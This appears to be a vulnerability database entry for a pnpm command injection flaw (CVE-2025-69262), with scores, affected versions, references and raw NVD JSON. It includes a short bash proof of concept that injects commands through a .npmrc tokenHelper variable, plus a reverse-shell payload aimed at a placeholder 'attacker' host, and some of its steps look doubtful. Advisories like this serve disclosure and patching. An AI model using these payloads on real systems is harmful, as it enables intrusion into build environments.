Security Vulnerability Report
CVE-2025-69262 CVSS 7.5 HIGH

Published: 2026-01-07 23:15:50
Last Modified: 2026-01-12 21:50:45

Description

pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
(Secondary metric; see the raw record below. The Primary NVD metric for the same CVE is 7.8 HIGH, vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.)
Weaknesses: CWE-78, CWE-94

Configurations (Affected Products)

cpe:2.3:a:pnpm:pnpm:*:*:*:*:*:*:node.js:* - VULNERABLE
pnpm >= 6.25.0 and < 10.27.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-69262 PoC - pnpm Command Injection via .npmrc tokenHelper
# This PoC demonstrates how an attacker can achieve RCE by controlling environment variables

# Setup: Create a malicious .npmrc file with tokenHelper
cat > .npmrc << 'EOF'
tokenHelper=${PNPM_TOKEN_HELPER}
EOF

# Attack: Set malicious environment variable containing command injection payload
export PNPM_TOKEN_HELPER='; whoami > /tmp/pwned.txt; echo "'

# When pnpm tries to use tokenHelper, it will execute:
# Original: ${PNPM_TOKEN_HELPER}
# After expansion: ; whoami > /tmp/pwned.txt; echo "
# This results in arbitrary command execution

# Trigger pnpm operation
export PNPM_HOME="$(whoami)"
pnpm install

# Alternative payload for reverse shell:
export PNPM_TOKEN_HELPER='; bash -i >& /dev/tcp/attacker/4444 0>&1; echo "'

References

https://github.com/pnpm/pnpm/releases/tag/v10.27.0 (Product, Release Notes)
https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69262",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T23:15:50.330",
    "lastModified": "2026-01-12T21:50:45.267",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.8,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-78" },
          { "lang": "en", "value": "CWE-94" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pnpm:pnpm:*:*:*:*:*:*:node.js:*",
                "versionStartIncluding": "6.25.0",
                "versionEndExcluding": "10.27.0",
                "matchCriteriaId": "CA432522-59B0-4DD7-AB6E-AE3D30B63EDC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}